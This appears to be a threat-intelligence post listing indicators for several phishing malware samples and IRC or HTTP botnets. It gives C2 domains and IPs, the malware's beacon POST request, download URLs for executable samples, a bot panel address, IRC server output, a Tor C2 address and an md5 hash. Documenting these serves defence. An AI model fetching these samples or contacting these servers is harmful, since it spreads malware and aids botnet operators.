jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware:

34324325kgkgfkgf.com
dsffdsk323721372131.com
fdshjfsh324332432.com
jdsiwiqweiqwyreqwi.com 80.242.123.208


HTTP Requests:

URI:
http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php

DATA:
POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host: jdsiwiqweiqwyreqwi.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

samples:
80.242.123.211:888/darky.exe
80.242.123.211:888/1.exe
80.242.123.211:888/run.exe

Hosting infos:
http://whois.domaintools.com/80.242.123.208

89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)

Botnet found by sPy.

Only server and port no channels here because no exe file to see for more.
Feel free to check for channels ur self.

Connecting to 89.248.172.240 (6667)

Invisible Users 12: 12 3554
Operators: 2 operator(s) online
Channels: 12 channels formed
Clients: I have 3555 clients and 0 servers
Local users: 3555 29989 Current local users 3555, max 29989
Global users: 3555 15450 Current global users 3555, max 15450

Hosting infos:
http://whois.domaintools.com/89.248.172.240

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities:
hxxp://pastebin.com/dEMULiQV

Now talking in #botnets
Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
Topic By : [ uyap ]
Modes On : [ #botnets ] [ +smntrMuk fcuked ]

The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log

onetimes27s.com(Reverse Dns Bot hosted in Russian Federation Saint Petersburg Majordomo Llc)



This package was posted in one hacking board as http bot.
After checking the file here results:

Domains used :

hoseen454r.com inactive
onetimes27s.com active

Resolved : [ onetimes27s.com ] To [ 178.250.245.186 ]

Panel:
hxxp://178.250.245.186/pref1/  password protected

Sample here

Hosting infos:
http://whois.domaintools.com/178.250.245.186


gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)

Server:  gki2mpdt3rsokbmv.onion
Port:  6667
Channel:  #channel

Oper:
[wac] (wac@9bedb2.host): ac
[wac] #channel
[wac] lair.hell.net :Cerberus Server
[wac] idle 00:00:18, signon: Tue May 13 18:24:47
[wac] End of WHOIS list.

The owner must have used very old bot code to create this, as it fails to work properly on windows 7 and higher.

Related md5s (Download sample from Malwr.com)
Ircbot: c94783e10995197f9177e6c72ae53e6a